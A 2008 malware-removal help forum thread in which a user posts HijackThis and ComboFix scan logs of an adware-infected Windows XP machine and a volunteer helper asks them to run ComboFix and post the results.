virus!

  • Joined: 19 May 2008
  • Posts: 5
  • Location: beograd

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:44:21, on 2.6.2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\UAService7.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Program Files\Analog Devices\SoundMAX\smax4.exe
C:\Program Files\Eset\nod32kui.exe
C:\WINDOWS\system32\WgaTray.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe
C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE
C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE
C:\Program Files\LimeWire\LimeWire.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe
C:\Program Files\Opera\Opera.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\WINDOWS\system32\wscntfy.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\Program Files\AVG\AVG8\avgfrw.exe
C:\Program Files\AVG\AVG8\avgtray.exe
C:\PROGRA~1\AVG\AVG8\avgupd.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = [Link visible only to logged-in users]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = [Link visible only to logged-in users]
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = [Link visible only to logged-in users]
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = 127.0.0.1
R3 - URLSearchHook: (no name) - {9CB65206-89C4-402c-BA80-02D8C59F9B1D} - C:\Program Files\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL (file missing)
R3 - URLSearchHook: (no name) - {00A6FAF6-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL (file missing)
R3 - URLSearchHook: Yahoo! ¤u¨a¦C - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: MyWebSearch Search Assistant BHO - {00A6FAF1-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL (file missing)
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: mwsBar BHO - {07B18EA1-A523-4961-B6BB-170DE4475CCA} - C:\Program Files\MyWebSearch\bar\1.bin\MWSBAR.DLL (file missing)
O2 - BHO: (no name) - {23D44BCF-AA7A-41D6-8905-E808F16322EF} - C:\WINDOWS\system32\gebbxvw.dll (file missing)
O2 - BHO: cpmsky browser optimizer - {277a0c59-78e6-99de-6946-a2a71f55165a} - C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll
O2 - BHO: {ed108e55-6531-0438-6864-6d2ea2229663} - {3669222a-e2d6-4686-8340-135655e801de} - C:\WINDOWS\system32\xhvgmvfa.dll (file missing)
O2 - BHO: adzgalore - {386c1b5e-df71-2d31-08e7-83354bf04e50} - C:\WINDOWS\system32\nskD4.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll
O2 - BHO: (no name) - {517854CF-7B97-4204-BC88-13768F2CCF61} - C:\WINDOWS\system32\ssttu.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: UrlHelper Class - {74322BF9-DF26-493f-B0DA-6D2FC5E6429E} - C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live pomagac za prijavljivanje - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Ask Search Assistant BHO - {9CB65201-89C4-402c-BA80-02D8C59F9B1D} - C:\Program Files\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL (file missing)
O2 - BHO: AVG Security Toolbar - {A057A204-BACC-4D26-9990-79A187E2698E} - C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL
O2 - BHO: mysidesearch browser optimizer - {bec35b16-b03b-b4e6-8917-3250adcd93bc} - C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
O2 - BHO: Ask Toolbar BHO - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\2.bin\ASKTBAR.DLL (file missing)
O3 - Toolbar: Ask Toolbar - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\2.bin\ASKTBAR.DLL (file missing)
O3 - Toolbar: My Web Search - {07B18EA9-A523-4961-B6BB-170DE4475CCA} - C:\Program Files\MyWebSearch\bar\1.bin\MWSBAR.DLL (file missing)
O3 - Toolbar: Yahoo! ¤u¨a¦C - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: BearShare MediaBar - {D3DEE18F-DB64-4BEB-9FF1-E1F0A5033E4A} - C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareMediaBar.dll
O3 - Toolbar: AVG Security Toolbar - {A057A204-BACC-4D26-9990-79A187E2698E} - C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\smax4.exe" /tray
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
O4 - HKLM\..\Run: [bend logo clock film] C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe
O4 - HKLM\..\Run: [{e0b2bd96-0d3c-b2e0-b9b8-fdc3e3b7792d}] C:\WINDOWS\System32\Rundll32.exe "C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll" DllInit
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [RealInter] C:\DOCUME~1\NETWOR~1\APPLIC~1\MOVESI~1\Bat flag close.exe
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - Startup: LimeWire On Startup.lnk = C:\Program Files\LimeWire\LimeWire.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
O4 - Global Startup: Adobe Reader Synchronizer.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe
O4 - Global Startup: AudioDeck.lnk = C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe
O4 - Global Startup: Remote Controller.lnk = C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE
O4 - Global Startup: Scheduler.lnk = C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE
O8 - Extra context menu item: &Search - [Link visible only to logged-in users]
O8 - Extra context menu item: E&xport to Microsoft Excel - [Link visible only to logged-in users]\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll
O20 - AppInit_DLLs: avgrsstx.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe

--
End of file - 9792 bytes



  • dr_Bora
  • Anti Malware Fighter, Rank 2
  • Joined: 24 Jul 2007
  • Posts: 12280
  • Location: Höganäs, SE

Hi...

Download ComboFix from one of the following addresses to your Desktop:
[Link visible only to logged-in users]
[Link visible only to logged-in users]
[Link visible only to logged-in users]

Run it and do not touch the program window while it scans.
Follow the on-screen instructions. When it finishes, a log (C:\ComboFix.txt) will appear; copy it here for us.



  • Joined: 19 May 2008
  • Posts: 5
  • Location: beograd

ComboFix 08-06-01.6 - n 2008-06-02 21:38:59.2 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.96 [GMT 2:00]
Running from: C:\Documents and Settings\n\My Documents\ComboFix.exe

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Bob and Bill adventures - Wild Hunting.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Crazy Blocks.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Lines.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\The Battles Of Helicopters.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Video Pool.lnk
C:\WINDOWS\17PHolmes2000201.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll
C:\WINDOWS\system32\arlfnpmy.ini
C:\WINDOWS\system32\bslxdnsl.ini
C:\WINDOWS\system32\exworkdw.ini
C:\WINDOWS\system32\hjechnje.ini
C:\WINDOWS\system32\hqmjjueu.ini
C:\WINDOWS\system32\iadlmobi.dll
C:\WINDOWS\system32\kxghksxx.ini
C:\WINDOWS\system32\lsndxlsb.dll
C:\WINDOWS\system32\nainpaun.ini
C:\WINDOWS\system32\nskD4.dll
C:\WINDOWS\system32\sdjwdqvw.ini
C:\WINDOWS\system32\sqlgnaju.ini
C:\WINDOWS\system32\ssttu.dll
C:\WINDOWS\system32\suubjcjh.dll
C:\WINDOWS\system32\tounsikg.ini
C:\WINDOWS\system32\uttss.ini
C:\WINDOWS\system32\uttss.ini2
C:\WINDOWS\system32\ympnflra.dll
.
---- Previous Run -------
.
C:\Program Files\Adzgalore Games Collection
C:\Program Files\Adzgalore Games Collection\BattlesOfHelicopters.exe
C:\Program Files\Adzgalore Games Collection\BobAndBill.exe
C:\Program Files\Adzgalore Games Collection\CrazyBlocks.exe
C:\Program Files\Adzgalore Games Collection\Lines.exe
C:\Program Files\Adzgalore Games Collection\uninstall.exe
C:\Program Files\Adzgalore Games Collection\VideoPool.exe
C:\WINDOWS\cookies.ini
C:\WINDOWS\system32\adzgalore-remove.exe

.
((((((((((((((((((((((((( Files Created from 2008-05-02 to 2008-06-02 )))))))))))))))))))))))))))))))
.

2008-06-02 21:32 . 2008-06-02 21:32 2,280 --a------ C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:28 . 2008-06-02 20:28 10,520 --a------ C:\WINDOWS\system32\avgrsstx.dll
2008-06-02 20:27 . 2008-06-02 20:39 <DIR> d-------- C:\WINDOWS\system32\drivers\Avg
2008-06-02 20:27 . 2008-06-02 20:27 <DIR> d-------- C:\Program Files\AVG
2008-06-02 20:27 . 2008-06-02 21:34 <DIR> d-------- C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-02 20:27 . 2008-06-02 21:32 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\avg8
2008-06-02 20:27 . 2008-06-02 20:27 96,520 --a------ C:\WINDOWS\system32\drivers\avgldx86.sys
2008-06-01 20:41 . 2008-06-01 20:41 <DIR> d-------- C:\Documents and Settings\NetworkService\Application Data\move sixth tool
2008-06-01 20:40 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41 <DIR> d-------- C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30 <DIR> d-------- C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12 <DIR> d-------- C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Program Files\Ashiyane Digital Security Team
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21 75 --a------ C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47 <DIR> d-------- C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47 <DIR> d-------- C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39 483,328 --a------ C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52 <DIR> d-------- C:\Program Files\BearShare Applications
2008-05-17 21:07 . 2008-05-17 21:07 95,865 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
2008-05-17 21:03 . 2008-05-17 21:03 63,916 --a------ C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
2008-05-16 16:12 . 2008-05-16 16:12 440,832 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
2008-05-14 03:28 . 2008-05-14 03:28 41,296 --a------ C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57 <DIR> d-------- C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-02 21:33 <DIR> d-------- C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23 <DIR> d-------- C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19 691,545 --a------ C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37 2,546 --a------ C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51 <DIR> d--hsc--- C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16 <DIR> d-------- C:\Program Files\Spybot - Search & Destroy

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-02 19:27 --------- d-----w C:\Program Files\ESET
2008-05-27 19:26 --------- d-----w C:\Program Files\MSN Messenger
2008-05-27 19:25 --------- d-----w C:\Program Files\Messenger Plus! Live
2008-05-27 18:35 --------- d-----w C:\Program Files\Common Files\Adobe
2008-05-26 19:48 --------- d-----w C:\Program Files\Macrogaming
2008-05-26 19:47 --------- d-----w C:\Program Files\Free Download Manager
2008-05-26 19:47 --------- d-----w C:\Program Files\Championship Manager 5
2008-05-26 19:46 --------- d-----w C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23 81,920 ----a-w C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23 47,360 ----a-w C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23 --------- d-----w C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38 --------- d-----w C:\Program Files\Yahoo!
2008-05-16 18:36 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-05-12 17:04 --------- d-----w C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13 --------- d-----w C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22 --------- d-----w C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50 --------- d-----w C:\Program Files\Windows Live
2008-04-28 20:03 --------- d-----w C:\Documents and Settings\n\Application Data\move sixth tool
2008-04-28 20:03 --------- d-----w C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 20:02 --------- d-----w C:\Program Files\move sixth tool
2008-04-28 20:02 --------- d-----w C:\Documents and Settings\All Users\Application Data\Frag great bend logo
2008-04-28 20:01 --------- d-----w C:\Program Files\Circle Developement
2008-04-28 16:59 --------- d-----w C:\Program Files\Lystech Computing
2008-04-21 17:34 744 ----a-w C:\mail.vbs
2008-04-18 19:19 --------- d-----w C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14 --------- d-----w C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08 --------- d-----w C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37 --------- d-----w C:\Program Files\MauZ Php Editor
2008-04-09 15:01 --------- d-----w C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45 --------- d-----w C:\Program Files\Apple Software Update
2008-04-07 15:44 --------- d-----w C:\Documents and Settings\All Users\Application Data\Apple
2008-04-04 19:17 --------- d-----w C:\Program Files\Vista Start Menu
2008-04-04 18:50 64,650 ----a-w C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50 6,106 ----a-w C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 10:18 720,896 ----a-w C:\WINDOWS\iun6002.exe
2008-04-02 18:06 --------- d-----w C:\Program Files\Zone Labs
2008-04-02 10:02 --------- d-----w C:\Program Files\Java
2007-11-05 12:00 524,300 ----a-w C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28 1,164,456 ----a-w C:\Program Files\install_flash_player.exe
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{3669222a-e2d6-4686-8340-135655e801de}]
C:\WINDOWS\system32\xhvgmvfa.dll

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45 402872 --a------ C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{A057A204-BACC-4D26-9990-79A187E2698E}]
2008-06-02 20:27 2050816 --a------ C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{bec35b16-b03b-b4e6-8917-3250adcd93bc}]
2008-05-16 16:12 440832 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{A057A204-BACC-4D26-9990-79A187E2698E}"= "C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL" [2008-06-02 20:27 2050816]

[HKEY_CLASSES_ROOT\clsid\{a057a204-bacc-4d26-9990-79a187e2698e}]
[HKEY_CLASSES_ROOT\avgtoolbar.AVGTOOLBAR]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser]
"{A057A204-BACC-4D26-9990-79A187E2698E}"= C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL [2008-06-02 20:27 2050816]

[HKEY_CLASSES_ROOT\clsid\{a057a204-bacc-4d26-9990-79a187e2698e}]
[HKEY_CLASSES_ROOT\avgtoolbar.AVGTOOLBAR]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"RealInter"="C:\DOCUME~1\NETWOR~1\APPLIC~1\MOVESI~1\Bat flag close.exe" [2008-04-28 22:02 479232]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"bend logo clock film"="C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe" [2008-06-02 21:49 549888]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]
"AVG8_TRAY"="C:\PROGRA~1\AVG\AVG8\avgtray.exe" [2008-06-02 20:27 1177368]

C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=avgrsstx.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=
"C:\\Program Files\\AVG\\AVG8\\avgupd.exe"=

R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R1 AvgLdx86;AVG AVI Loader Driver x86;C:\WINDOWS\system32\Drivers\avgldx86.sys [2008-06-02 20:27]
R2 avg8wd;AVG8 WatchDog;C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe [2008-06-02 20:27]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
